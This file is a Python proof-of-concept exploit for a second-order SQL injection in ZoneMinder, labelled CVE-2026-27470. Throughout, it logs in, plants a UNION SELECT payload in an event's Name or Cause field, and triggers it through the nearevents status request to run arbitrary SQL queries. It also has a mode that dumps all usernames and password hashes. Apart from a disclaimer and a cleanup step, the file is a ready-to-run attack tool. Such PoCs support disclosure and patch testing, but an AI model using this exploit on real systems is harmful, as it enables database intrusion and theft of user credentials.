#!/usr/bin/env python3 """ CVE-2026-27470 - ZoneMinder Second-Order SQL Injection PoC ============================================================= Affected versions : <= 1.36.37 and 1.37.61 - 1.38.0 Fixed in : 1.36.38 / 1.38.1 Vulnerable file : web/ajax/status.php -> getNearEvents() LEGAL DISCLAIMER: This tool is for educational and authorized security research purposes only. Do not use against systems you do not own or have explicit written permission to test. Usage: python3 poc.py -t http://10.10.10.10 -u admin -p password python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()" python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users """ import argparse import re import sys import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) BANNER = """ ╔══════════════════════════════════════════════════════════╗ ║ CVE-2026-27470 — ZoneMinder Second-Order SQLi PoC ║ ║ CVSS 8.8 | Authenticated | Events Permission ║ ╚══════════════════════════════════════════════════════════╝ """ def get_csrf_token(session, target): """Extract __csrf_magic token from the page.""" resp = session.get(f"{target}/", verify=False, allow_redirects=True) m = re.search(r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']', resp.text) if m: return m.group(1) m2 = re.search(r'name=["\']__csrf_magic["\'][^>]*value=["\']([^"\']+)["\']', resp.text) if m2: return m2.group(1) return None def login(session, target, username, password): """ Authenticate to ZoneMinder and retrieve session cookie + CSRF token. If ZM_OPT_USE_AUTH=0, authentication is skipped and only the session is initialized. """ # Load the root page to initialize the session and grab the CSRF token resp = session.get(f"{target}/", verify=False, allow_redirects=True) # Extract CSRF token csrf = None m = re.search(r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']', resp.text) if m: csrf = m.group(1) if not csrf: m2 = re.search(r'name=["\']__csrf_magic["\'][^>]*value=["\']([^"\']+)["\']', resp.text) if m2: csrf = m2.group(1) session._zm_csrf = csrf # Store for later use # If auth is disabled, ZoneMinder redirects to the privacy page — session is ready if "privacy" in resp.url: print("[*] ZM_OPT_USE_AUTH=0 detected — auth disabled, session ready.") return True # Auth is enabled — send login POST data = { "view": "login", "action": "login", "username": username, "password": password, } if csrf: data["__csrf_magic"] = csrf resp2 = session.post(f"{target}/index.php", data=data, verify=False, allow_redirects=True) # Refresh CSRF token after login m3 = re.search(r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']', resp2.text) if m3: session._zm_csrf = m3.group(1) if "logout" in resp2.text.lower() or "console" in resp2.url: return True if resp2.status_code in (200, 302): resp3 = session.get(f"{target}/index.php?view=console", verify=False, allow_redirects=True) if resp3.status_code == 200 and "login" not in resp3.url: return True return False def get_event_id(session, target): """Retrieve any available event ID via the ZoneMinder status API.""" url = f"{target}/index.php" params = { "request": "status", "entity": "events", "sort_field": "Id", "sort_asc": "1", "limit": "1", } resp = session.get(url, params=params, verify=False) try: data = resp.json() events = data.get("results", []) if events: return events[0].get("Id") or events[0].get("id") except Exception: pass return None def inject_payload(session, target, event_id, payload, field="Name"): """ Phase 1: Write the malicious payload into the event Name or Cause field. ZoneMinder uses a parameterized query here — the payload is stored safely. """ url = f"{target}/index.php" csrf = getattr(session, '_zm_csrf', None) if field == "Name": data = { "request": "event", "action": "rename", "id": event_id, "eventName": payload, } else: # Cause data = { "request": "event", "action": "edit", "id": event_id, "newEvent[Cause]": payload, "newEvent[Notes]": "poc", } if csrf: data["__csrf_magic"] = csrf resp = session.post(url, data=data, verify=False) return resp.status_code == 200 def trigger_sqli(session, target, event_id, field="Name"): """ Phase 2: Trigger second-order injection via getNearEvents(). The stored payload is read from the DB and concatenated unsafely into SQL. """ url = f"{target}/index.php" params = { "request": "status", "entity": "nearevents", "id": event_id, "sort_field": field, "sort_asc": "1", } resp = session.get(url, params=params, verify=False) return resp def restore_event_name(session, target, event_id, original_name="Event"): """Restore the event name to its original value after exploitation.""" url = f"{target}/index.php" csrf = getattr(session, '_zm_csrf', None) data = { "request": "event", "action": "rename", "id": event_id, "eventName": original_name, } if csrf: data["__csrf_magic"] = csrf session.post(url, data=data, verify=False) def run_exploit(target, username, password, sql_query, field="Name", restore=True, manual_event_id=None): session = requests.Session() session.headers.update({ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)" }) print(f"\n[*] Target : {target}") print(f"[*] User : {username}") print(f"[*] Query : {sql_query}\n") # Step 1 — Authenticate print("[*] Logging in...") if not login(session, target, username, password): print("[-] Login failed. Check credentials.") sys.exit(1) print("[+] Session established.") # Step 2 — Get event ID if manual_event_id: event_id = manual_event_id print(f"[+] Event ID (manual): {event_id}") else: print("[*] Looking for an event ID...") event_id = get_event_id(session, target) if not event_id: print("[-] No events found. Specify one manually with --event-id.") sys.exit(1) print(f"[+] Event ID: {event_id}") # Step 3 — Build UNION-based payload # Events.Name is varchar(64) — keep payloads under 63 characters # UNION SELECT requires 2 columns to match (Id, StartDateTime) union_payload = f"' UNION SELECT ({sql_query}),NULL-- -" print(f"[*] Injecting payload into '{field}' field...") if not inject_payload(session, target, event_id, union_payload, field=field): print("[-] Failed to write payload. Check permissions.") sys.exit(1) print("[+] Payload stored via parameterized query — looks clean in the DB.") # Step 4 — Trigger second-order injection print("[*] Triggering second-order injection...") resp = trigger_sqli(session, target, event_id, field=field) print(f"[*] HTTP {resp.status_code}") result = None try: data = resp.json() # Real ZoneMinder response: {"nearevents": {"NextEventId": ""}} nearevents = data.get("nearevents", {}) if nearevents: result = (nearevents.get("NextEventId") or nearevents.get("PrevEventId") or nearevents.get("NextEventStartTime")) # Fallback: {"results": [...]} if not result: results = data.get("results", data.get("data", [])) if results: result = results[0].get("Id") or results[0].get("StartDateTime") if not result: result = str(data) except Exception: result = resp.text[:500] # Step 5 — Cleanup if restore: restore_event_name(session, target, event_id) print("[*] Event name restored.") return result def main(): print(BANNER) parser = argparse.ArgumentParser( description="CVE-2026-27470 — ZoneMinder Second-Order SQL Injection PoC" ) parser.add_argument("-t", "--target", required=True, help="Target URL (e.g. http://10.10.10.10)") parser.add_argument("-u", "--username", required=True, help="ZoneMinder username") parser.add_argument("-p", "--password", required=True, help="ZoneMinder password") parser.add_argument("--event-id", type=int, help="Event ID to use as injection carrier") parser.add_argument("--field", default="Name", choices=["Name", "Cause"], help="Injection field (default: Name)") parser.add_argument("--query", default="SELECT VERSION()", help="SQL query to execute") parser.add_argument("--dump-users", action="store_true", help="Dump all usernames and password hashes") parser.add_argument("--no-restore", action="store_true", help="Do not restore the event name after exploitation") args = parser.parse_args() target = args.target.rstrip("/") eid = args.event_id if args.dump_users: print("[*] Mode: User dump") count_result = run_exploit( target, args.username, args.password, "SELECT COUNT(*) FROM Users", field=args.field, restore=not args.no_restore, manual_event_id=eid ) print(f"\n[+] User count: {count_result}\n") # Events.Name is varchar(64) — fetch username and hash separately to stay within limit for i in range(10): uname = run_exploit( target, args.username, args.password, f"SELECT Username FROM Users LIMIT {i},1", field=args.field, restore=not args.no_restore, manual_event_id=eid ) # Empty result means no more users uname_str = str(uname) if uname else "" if not uname_str or uname_str in ("None", "1", "") or "{" in uname_str: break passwd = run_exploit( target, args.username, args.password, f"SELECT Password FROM Users LIMIT {i},1", field=args.field, restore=not args.no_restore, manual_event_id=eid ) print(f"[+] User {i+1}: {uname}:{passwd}") else: result = run_exploit( target, args.username, args.password, args.query, field=args.field, restore=not args.no_restore, manual_event_id=eid ) print(f"\n[+] Result: {result}\n") if __name__ == "__main__": main()